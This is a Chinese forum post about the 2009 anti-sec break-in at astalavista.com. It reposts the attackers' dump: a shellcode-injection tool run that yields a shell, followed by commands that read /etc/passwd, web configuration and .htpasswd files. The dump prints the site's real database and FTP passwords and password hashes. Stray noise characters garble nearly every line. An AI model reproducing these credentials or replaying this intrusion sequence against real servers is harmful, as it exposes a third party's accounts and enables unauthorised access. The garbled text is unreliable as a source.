里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
& m7 u- v0 O% z1 L/ x/ O5 g
0 L) r2 ~4 D, W$ Q o6 X( [[root@front3 ~]# curl -I litespeedtech.com
- f7 B G+ L# |6 k2 {: l8 S! mHTTP/1.1 200 OK
3 A& c6 |5 L) c% D' ^5 M0 yDate: Fri, 05 Jun 2009 22:54:51 GMT- V, M) d: h1 W9 X" I8 L
Server: LiteSpeed
, B0 \0 V' F$ {* r& L: Y2 Z2 f# p8 r1 B
) C& ~& D4 r1 F0 C2 n9 n8 b另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
6 z: m& Q' L3 ?" ]
# I0 z3 u: L9 R' p- {有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。, ^4 k! C% e' j2 J1 w, |" _
7 D/ k4 B1 e5 K% g
6 `2 N% G N7 ]4 x0 I
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 7 I6 g* T3 F1 b1 `! ^; w
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
( {# L! V0 C9 I8 y/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \( q: d& V* \" Y
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /' C ?2 i& s# G6 ?: Y
\/ \/ \/ \/ \/ \/ \/
6 `& C5 {7 S8 O( ]) M1 \6 r& v& c The Hacking & Security Community" d: c! q v+ q* V: y
[+] Founded in 1997 by a hacker computer enthusiast2 N* ~. @7 u7 }7 X' i1 N
[-] Exposed in 2009 by anti-sec group
5 k* V3 Z( L7 r6 H( V" R) X) w. u$ |
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
) {7 [& G2 |2 M7 ^0 h5 @0 @1 U) r) R>> 03. Who’s behind the site?( B/ `) ^/ F) f4 B0 U! X0 V
>>
5 s/ G$ Z+ ^/ F1 `, b) X0 n>> A team of security and IT professionals, and a countless number of contributors from all over the world." R' E/ o" Y/ D7 A z
3 h0 ~1 J" `6 [& p x4 Q>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
8 I+ D$ C" R U( R. _" ]7 N9 k>>
- F$ o' x. D% N0 `% p>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
0 K+ K5 O) d8 q1 a' Wmilitary institutions.
1 j+ x& \) t4 g" n* r: f `5 X>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
2 ?- l: u0 Z& {" h8 B+ L+ y& t% j6 U4 s! z* y
Why has Astalavista been targeted?* A& f5 p- `: m
* p# Q* {7 O0 E$ i) j6 tOther than the fact that they are not doing any of this for the “community” but
( A* s% ?8 u( d2 ^for the money, they spread exploits for kids, claim to be a security community2 x, Q% j# M7 ^2 I0 [( ?/ I; h
(with no real sense of security on their own servers), and they charge you $6.669 |! L6 |) |/ i5 }, | C
per months to access a dead forum with a directory filled with public releases
# N* _! J$ H- d& dand outdated / broken services.
& F8 `0 H' p W) d$ L' l& Z. F, r h9 l$ }5 Y8 c. h4 B" K" {
We wanted to see how good that “team of security and IT professionals” really is.$ O) ?+ s( ~% t! P% _
; y( z* v5 B8 w, rLet’s begin.
/ u- ^2 W: T# M6 m5 e7 V) [& T9 @9 l
anti-sec:~# ./g0tshell astalavista.com -p 80; _( q3 {# N. a+ h4 y% }$ s
[+] Connecting to astalavista.com:80
& t [ Z' G' Q R6 ^0 R' ^[+] Grabbing banner…
5 y5 D% V) P6 P! bLiteSpeed \( e6 X; R ^3 y* f5 S
[+] Injecting shellcode…
* X; c5 q( b! X# P, \2 [9 c[-] Wait for it; X& q6 ^+ M+ g5 J! E5 x) Q! i4 t4 P9 {
) q- {4 ^3 A' n' O/ b0 m
[~] We g0tshell
; {$ p- a0 ~: }4 b! S2 d% {( Buname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
i, V! z% K# x; r6 YID: uid=100(apache) gid=500(apache) groups=500(apache)/ ]% E; P; D* q7 A+ T \2 j2 s, B q
; V9 x! d; }. o# j0 o
sh-3.2$ cat /etc/passwd
6 {0 }( p. f* H3 p6 F; N; Qroot:x:0:0:root:/root:/bin/bash c3 N; N# n+ o b- f5 `
bin:x:1:1:bin:/bin:/sbin/nologin( p1 S& X _1 d: _( a
daemon:x:2:2:daemon:/sbin:/sbin/nologin0 p0 C5 B. P; i* f/ {& U. L2 K
adm:x:3:4:adm:/var/adm:/sbin/nologin% f3 r2 t5 J8 [9 }% g5 D/ x* ]
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin& M9 S5 ?- c. t1 W- i. c, _5 ~
sync:x:5:0:sync:/sbin:/bin/sync8 I. m/ s* l; |
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
# h/ R/ ~7 \% ?# v9 M/ \halt:x:7:0:halt:/sbin:/sbin/halt. s6 f6 }' J+ w3 S8 s* _
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ L" D9 K5 k' }; onews:x:9:13:news:/etc/news:
5 N8 S3 T6 O; \5 }1 P( C7 Juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin( ]+ T7 x) H( L# c. @
operator:x:11:0 perator:/root:/sbin/nologin
2 o V6 K, Z4 ]4 ~3 R4 U/ ygames:x:12:100:games:/usr/games:/sbin/nologin
8 r3 Y. ]5 ~* W& p* a. z# egopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- V0 R3 h: E4 O3 o- F: I& H, qftp:x:14:50:FTP User:/var/ftp:/sbin/nologin7 @+ N4 {6 f2 v6 F1 k+ \
nobody:x:99:99:Nobody:/:/sbin/nologin" f& c- S9 w3 I ]& @! k
rpm:x:37:37::/var/lib/rpm:/sbin/nologin* |+ S4 c! M% a- q- O& e5 U# ]: X
dbus:x:81:81:System message bus:/:/sbin/nologin
. i1 i9 ~6 t) \! f0 Snscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- X8 S$ [5 Q1 B$ \mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
# I" T4 U: K5 ]- e8 U; Ksmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin$ d- N8 P; j; I0 ^
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin1 F2 n4 ]% h3 i- M
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin- a M. h1 F" V- p/ ]
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
0 C i; x- B! |rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
1 R" c1 F5 M6 A% K0 m/ t& e, vnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin- u6 C { d5 o, j# j) G- ]
sshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
6 F% U% E6 P2 w! fpcap:x:77:77::/var/arpwatch:/sbin/nologin
- [; j5 V8 M b. Z' |$ \named:x:25:25:Named:/var/named:/sbin/nologin
- v" z* o1 j5 k' x7 napache:x:100:500::/var/www:/bin/false0 Q' p( y- t& \+ f
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
4 O$ t+ x( V. k& Q+ pmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
6 y9 e; V" [' }# r( awebapps:x:500:501::/var/www/html:/bin/bash$ R" b/ v0 f. x4 {
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash8 C: W3 n% M$ r- U" ?+ |
admin:x:501:502::/home/admin:/bin/bash
4 a5 j) ?* X H. U3 `6 z* i# }9 qjon:x:502:503::/home/jon:/bin/bash7 u" I/ Z( A, W0 h2 l
com:x:503:504::/home/com:/bin/bash2 _8 }% n6 k: U K- }
ntp:x:38:38::/etc/ntp:/sbin/nologin) L! L ?% [4 }) j
ais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin
* q' D8 Y' S$ K4 r/ ?astanet:x:504:505::/home/astanet:/bin/bash$ ^& ~2 T9 X7 c. ?3 F! Z- F( a# n
avahi:x:70:70:Avahi daemon:/:/sbin/nologin5 b5 p2 X2 j1 W9 Y
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin0 Q/ w2 {& {: c' V) u
0 }- Q. S% m M9 V. |9 I, k
sh-3.2$ cat /etc/hosts, @' C: g$ x; h( U$ @% h1 J
# Do not remove the following line, or various programs5 B$ Q# e3 D8 F2 B' } o4 x
# that require network functionality will fail.
) y. B+ F2 q( x, q6 J% D* c4 e127.0.0.1 localhost.localdomain localhost G- `; r5 \- G) S
::1 localhost6.localdomain6 localhost6
: H# |4 ?9 ^ P( M# D0 Y6 U% Z80.74.154.172 asta1.astalavistaserver.com8 o) D0 r! G. F
' i% s. m' {5 n- p: l- p' |0 J
sh-3.2$ pwd( ^. P6 A! R( t9 g6 E- \/ W8 O
/home/com/public_html
9 S2 ]) Z Q" Q" x- a
- l5 A5 a" K" Y$ W9 _sh-3.2$ ls -la" |* v( r: j% a% f5 L
total 18460
: ^, C+ T u* l+ ]* Qdrwxr-xr-x 30 com apache 4096 May 28 17:06 . T; Y# c* _( ?; S5 }9 m
drwx–x–x 11 com com 4096 Jun 25 2008 ..6 b4 N/ J- H; S4 j2 h8 I% c- s
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin: V7 c9 R8 z- {- y$ H9 C* ?
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
: z3 y0 a0 P& xdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin7 ~; K$ {6 i5 m+ J8 \. F
drwxrwxrwx 2 com com 4096 May 19 00:50 config j: I. M% ^% r, w9 r% f
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core, l9 j1 Z5 O: g% e5 e2 t: n3 h
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
( S) E) F) C/ mdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing( ]! v9 C+ h& j6 I" A
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
2 j1 m4 y' d/ edrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
7 ~' w0 x" y) x- a8 w$ l* t. L, @-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php. A6 D b1 X! p' f$ F5 X
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd- ?1 q( f5 m" i1 X* `! f
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor. g, @7 c c$ g3 x2 P. O
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico& L- Z& }1 F; U5 s! X0 q+ D
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed! [1 _2 U9 G! H2 ^0 ~% [. i9 N
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess3 r Q! S; B8 n. }) \$ p
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
/ _/ v m( m' X* T2 v, |-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
3 `. u9 n4 f$ n/ Qdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool# t5 w y" F- F0 S) P
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images% T1 @3 Y2 \6 p/ p/ D1 v$ E4 ^) S
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
- H% c. [* s/ w/ S; }drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
; l& j8 W8 E; k1 q, y( Kdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang* `* R8 o% C/ e* P2 x
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
& j. }/ R5 p- b* w( Ldrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
9 P% Y4 q% c" b4 ?0 v" Gdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
, e4 o7 c5 J* J {+ ndrwxr-xr-x 34 com com 4096 May 28 16:30 modules5 T$ z/ _# K3 j2 H+ |
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
9 |& ]5 F* x; S" D" o/ q& H& |* Jdrwxrwxr-x 22 com com 4096 May 28 17:06 _new; w* x. U7 [- y# x0 b3 [
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
) A F+ p+ p$ \. }3 ?* Xdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
' s# R7 v3 L; y! s1 o; Ydrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy5 a* |3 k6 s6 Q7 R
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
. b5 g; K0 E; R$ j5 ]/ h+ @-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
+ C. v2 r4 \* |; B6 J$ ~-rw-r–r– 1 com com 223 Mar 30 15:32 test.php$ _. S, W. ?2 ~3 {! M$ ?
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes8 [ s) f* P6 M( Q y
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
1 ~( I' j4 F/ I, q" Ddrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam0 F7 X9 g. b: u! z1 A6 R
$ }# R$ |; h; w7 o
sh-3.2$ head -20 index.php
R+ u% W- q- e, K8 E; k0 f2 r<?php9 ~0 B. L# N1 p( U, I
- X6 j9 O: e! W: c" ^
/**/ d" Q3 X4 N' D1 v' q3 O Q M
* The main page for the CMS2 ` W# @/ D. }/ v
* @copyright CONTREXX CMS - COMVATION AG' r- p, }5 H+ t R/ y6 W
* @author Comvation Development Team
" a6 x; o1 J+ J4 g) l* @version v1.0.9.10.1 stable; e( G7 m* `: a* D9 Q' L) ~
* @package contrexx
. C* m1 I A5 `7 A" S8 i9 E( k7 l* @subpackage core
. g3 c' `+ f* Y! b+ s2 E* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage7 e5 C- ?+ x- u
* @since v0.0.0.0' B+ Z6 _( r4 A6 C0 e4 M1 T
* @todo Capitalize all class names in project
: }: \8 ~( a3 X( {* @uses /config/configuration.php8 I- X# I1 U$ B3 ?" V0 w
* @uses /config/settings.php
4 Z- l& A1 F( x* @uses /config/version.php
. v& g3 u9 s5 O$ }. i* @uses /core/API.php& l0 r+ U6 D3 }3 }1 I+ ]. N$ k
* @uses /core_modules/cache/index.class.php# t2 L) s M& b- \( p( q0 ^) }
* @uses /core/error.class.php3 L3 `& O* K- p' O3 S
* @uses /core_modules/banner/index.class.php
6 H- Z" z8 R+ l7 i! ~3 D3 l% e* @uses /core_modules/contact/index.class.php/ z7 m8 C4 T3 c8 C5 Q2 ?9 U
3 V: R, B- x8 }sh-3.2$ cd config/: |$ w2 D9 m8 g- u, c
sh-3.2$ ls -la9 h0 I& R1 {% P3 e) c
total 32
2 _% w- F E. R$ I7 ydrwxrwxrwx 2 com com 4096 May 19 00:50 .8 v6 V2 |. f4 z/ d9 B0 n
drwxr-xr-x 30 com apache 4096 May 28 17:06 ../ O( i: B/ W5 p. [
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php# |" T5 }! T) O7 Y' }
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
& l2 L( w) x# L0 }% S9 u-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php) U8 K, r0 f8 h% @
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
, N' s& c8 C) t9 g+ a y5 L
7 }6 u9 X1 c/ D& U) V' K- c. xsh-3.2$ cat configuration.php4 V( a$ o. ?: y4 K5 z7 H/ U
[snip]
1 E; r0 r1 r C; g3 Z5 U' Y/ k$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
5 y5 q' i- g2 l9 z4 [' d* S$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name- V1 T' M; q8 Z0 g! `( U$ ?
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix' W. t0 v/ Z7 C7 c3 B, s: b
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
# H9 p- M4 a' x P U$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
2 W' W' x* T/ k! f& m; d/ w$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
4 y- O6 H V7 d$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)8 `- K$ p9 r; O; V9 Q+ P
[snip]; g7 i5 Z( G3 F2 {- D- f' B
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
6 W2 l5 G3 W8 f: v* s! r$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode* b* N3 z* c" N- X7 S* ~1 A. ~
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost9 ~2 e: ?$ _4 ]- }
$_FTPCONFIG['port'] = 21; // Ftp remote port
9 e4 E$ l' p9 v: I5 M$ I' C$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username/ Q' \6 q, s2 a8 u' }. m: J* w1 T
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
) Q6 l% n% h" h3 T$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms- Y# c( Q" Y9 R) B
" J+ r% u4 h$ v' J4 z
sh-3.2$ cd ..1 [6 S5 Y5 I* I: k& c$ S5 q0 z( |
sh-3.2$ cd dvd/$ Y# d0 \$ W$ ]
sh-3.2$ ls -la W3 R9 [3 x2 j4 I5 k
total 29137803 a1 Y. X, o3 e/ b `7 @( J. S
drwxr-xr-x 2 com com 4096 Sep 9 2008 . b* b& \/ G( a% Y. L) M
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..- I9 i+ f8 X0 v+ V: n7 x
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar) f: r( V- ]9 n7 Z, `
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar) L& q3 A; k, }" c
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar1 R H! J7 [' j+ Q- |9 F X" Y; I2 e
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess U" N% k+ Z# t9 Z
# Y' S: y0 R1 R8 z# t1 Fsh-3.2$ cat .htaccess
* v' P$ U7 H' P0 ?4 d, [authType Basic
V- `6 A3 Y: j' T2 p$ T4 EauthName DVD
% w! x& `; s8 vauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
! n" F/ Z t6 C8 v- Srequire valid-user
1 l# }- f, M7 R+ @; v2 i# P0 l5 |. ^. y0 e! ^0 b, e( h1 z8 d1 ]8 L
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd2 d! Z: k4 @4 U" g, \
DVDdownload:CRD8cuY6.MPT6
# c1 @4 h7 l% ?* g$ a8 `$ gDVDdownload2:CR8a36.wluFMg
% i H& |5 y5 w+ ~: A* K; u# C
3 J3 |/ X( L1 A6 e/ i. fsh-3.2$ cat test.php
# [- P" h$ Z" E7 g# ]( c2 _$ M<?php+ \; g8 O5 u! h3 o) U' V' }1 O
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;6 K3 u2 c1 p' m% C) p, C
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));/ t' B7 q4 O! c" m' a$ [ n3 ?
echo $url;
% W* [/ L2 ?# Z0 Q1 x?>5 r* d# O7 c/ B t! ^$ E- l- U1 E
4 o: I2 s8 T3 v5 e
sh-3.2$ cd modifications/
" I# ]' Y9 A- ~* `sh-3.2$ ls -la" h* g' ]# R! Q0 x% j9 \2 G* P
total 32
0 P( }- C0 O9 D& n* Odrwxr-xr-x 8 com com 4096 May 11 12:48 .' ]. T/ B2 o$ s) V
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
( _9 q1 @6 J$ Y" l7 pdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng" N& ^: V7 B/ m% z
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
5 M/ e* M4 C9 Z; E( ^( _drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
* }/ Z6 g! f. z& M# idrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc- ^" o) S& U# t4 z* T7 C
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search$ B# j* @" W$ [6 N& T5 Z
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
: H. U; g' d- k! g* q9 z
k, P6 `/ W" r0 l% \7 i z/ Tsh-3.2$ ls -R
2 A( y+ e& I U: d% p" c9 i6 [.:
- m# k1 h% c' S& P/ }+ T1 [* i$ xcom_avtng cronjobs onlinetools pjirc search _tmp0 a v2 p- A) @# U! a- P
g1 k$ V5 E8 x; U9 U6 h' l0 [./com_avtng:
; H3 S: Y5 M& i3 P \1 J% pavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts% i5 i: ^5 E, i# z1 ^( x
0 A: n7 z) J# R! p$ j6 }8 T./com_avtng/scripts:, K: A& }! n- u' c
popunder.js
+ ?% Y+ i- ^& z/ J' J7 M
4 ] F! p8 ]# R./cronjobs:
' h9 q7 N( W% E: Q2 bexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp3 B2 I9 F& r' g$ y2 `9 ]
' o. u) p7 }7 \3 L./cronjobs/tmp: p7 @1 r: y* R8 d, g
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv# Y5 g" G5 N( M% C% p7 F/ a
! m) J8 u1 B4 f5 ^3 ^) h$ c' u5 O./onlinetools:% O) L o1 f8 _" g5 [* u
index.php
8 }3 L7 a& t4 I1 z. R7 a) k: ?5 A
* P9 V* O- S1 G O4 `! H./pjirc:
8 [: U' ^7 F4 K& s: |5 p; ^a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
- `. s' k; o( tAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
2 j E; [; E. _background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd# G3 C U( M0 o: [1 R
+ J. R/ E% s* V. w. D$ p ?1 `./pjirc/img:
/ H0 M* g9 }8 xange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
7 Q9 B# v: k# U. |; I h, G% B( K% earbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif . K/ H9 T7 Q0 K
verre-eau.gif
' } i% G8 B& T, [/ Targh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 9 X) m, M: l! u9 h5 h1 e
verre-vin.gif4 O+ L3 E4 W$ [! z( U
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
, B7 U3 g+ ]$ b2 a9 C9 u( k( ~# ibiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
# X# D6 ~. n- y5 q8 l7 r# ?- p% B$ \' K: o" ^; a
./pjirc/snd:
- x R3 D, w; X0 n8 M$ Y" E* G" N; [9 Gbell2.au ding.au G+ A, }# _6 |9 f. l& R. I
* G+ I6 o: l2 O- P6 x6 K
./search:- u8 _: i( }" }5 l, B/ f
searchEngines.php search.php C& M* e9 G: j
5 d3 k1 D% Q9 A" Y2 n. V./_tmp:9 z8 M. U* f6 e
defaultPorts.php defaultPorts.txt
5 g- c9 C( ^8 W1 }* m! n; Z( W8 W, t
sh-3.2$ cd cronjobs/5 ]& Y; F, ~/ W+ A, i" o" i* y, _, J
sh-3.2$ cat exploits.php5 H; n$ y& @: }9 K' O7 l
[snip]
' u S1 r' o: k8 {# U$ D$categories = array();, r- @# e. i3 _( v2 L
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;! k6 V! D9 [. i/ F: A1 e
$expolits = file($milw0rmFile);
. H& _( ]# b" v# A9 L$comExploits = array();, [, d! J. w( A/ M6 k
[snip]: O. X, C- @) |
// manage data
* l$ ^+ L1 S% Wfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
% m% j) d. m3 i6 i4 y& Q( i5 ?6 o4 a6 D( @) `) l1 H
// get path and title' ^/ v! P5 e( }( y- l/ O4 L
$expolits[$x] = trim($expolits[$x]);9 }! n# d7 L: F" x+ Z) W, M
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
; L6 w0 a5 r( M3 y3 V+ j) M5 s $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
' M9 J/ j1 g2 C& s0 j0 o" j$ ]- x2 T4 `
// check if file exists/ z7 |# i9 l- c$ Z4 o: O' n
if (file_exists($path)) {
9 B, @ V3 T! U5 T- x! d* m/ k6 J' Q$ Q: x7 `! d
$text = file_get_contents($path);3 b& D S: { [& h% M
! c; I* i8 ^& T0 K% _2 }! ^7 Z
// get content and date& J( e! u& L- u6 r P
//$text = htmlspecialchars($text, ENT_QUOTES);
6 x4 {1 H# b" T1 B- | $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));! a9 d% U' H% i, [
if ($tmptext != ”) {
( g: @) E% X' M9 J $text = $tmptext;( K+ V) k- C! s
} else { r( h$ S2 G7 Q3 b8 _
$text = addslashes(htmlentities($text, ENT_QUOTES));% x. [4 a# S- S
}0 u3 P# X% R, V. [ Z( o2 q
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
5 \& P% h4 S+ G9 f2 g0 Y. A $tmp = explode('-', $date);
2 }0 K' v9 V) } P $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
. A% p' Q2 [& ~7 x% b- h- _ $cat = getCategory ($path);, h' e7 E/ u; I. T M& w
$ext = pathinfo(basename($path));
7 `" v w0 b1 I: N, b! \4 m $ext = $ext['extension'];
7 y. \6 O; Z1 h. s3 ^0 P $qStr = ”2 e* @* W; @9 C- k7 u; q- \3 Y: P
SELECT `id`
o! o3 ^8 T# P9 s FROM `contrexx_module_exploits`
- F! ]6 \; M b& D WHERE `title` = ‘” . $title . “‘6 Q9 ]" c+ e3 Q& u! ~' Y, W
AND `date` = ‘” . $date . “‘5 K- y6 |! S+ K) E' R4 @5 E
“;7 n. R5 u& j; h# J( I* o
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;6 h. ?! L& e2 K5 {& B
$q = $_objDB->query($qStr);
; P. O, q; z' G! S! {0 M" r/ A6 g; l2 a$ t: n
if ($q->numRows() == 0) {
# ?: h% n: R3 `5 y2 @' L9 G; q9 j+ B$ C
// prepare array2 M7 Q8 @4 V% v0 x1 S7 t( b [
$comExploits[$x]['date'] = $date;8 p1 k3 u: A0 B) R
$comExploits[$x]['title'] = $title;
5 I/ y/ r s* \/ H $comExploits[$x]['author'] = ‘milw0rm’;9 K, m5 t! b/ f0 R' r1 h0 S
$comExploits[$x]['text'] = $text;) ?8 B0 ^: C0 [/ B, Y
$comExploits[$x]['source'] = $ext;
) t( {" S0 Z! p7 x $comExploits[$x]['url1'] = ”;6 S$ G( R, N/ H/ n5 @
$comExploits[$x]['url2'] = ”;
# \) R v& ]& ]/ |# [# _6 V $comExploits[$x]['catid'] = $cat;
! x( ~* d' W$ s7 j) `& l $comExploits[$x]['lang'] = ‘2′;
@" n) |5 ^, C+ s $comExploits[$x]['userid'] = ‘12′;
4 ~5 p/ I. x9 }' i $comExploits[$x]['startdate'] = ‘0000-00-00′;
; E/ d' e* V, m; t1 E) V $comExploits[$x]['enddate'] = ‘0000-00-00′;3 n& [. e: u3 i( I
$comExploits[$x]['status'] = ‘1′;
3 F8 _5 @" I$ W, F% b r $comExploits[$x]['changelog'] = $date;
' m, G* d2 M* e: ?% K, q$ k( o
) Z+ T" `- o% [, n q7 q }
/ p# ^& P1 c( n- E1 ^[snip]+ N: u. Q" f( @
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>4 s& l* U$ Q; D8 ?* U( @
<rss version=”2.0″>1 D' x# {. ]7 @* `- ~
<channel>
4 k/ i9 o( Z( _: o: x5 D <title>ASTALAVISTA.com - Exploits</title>
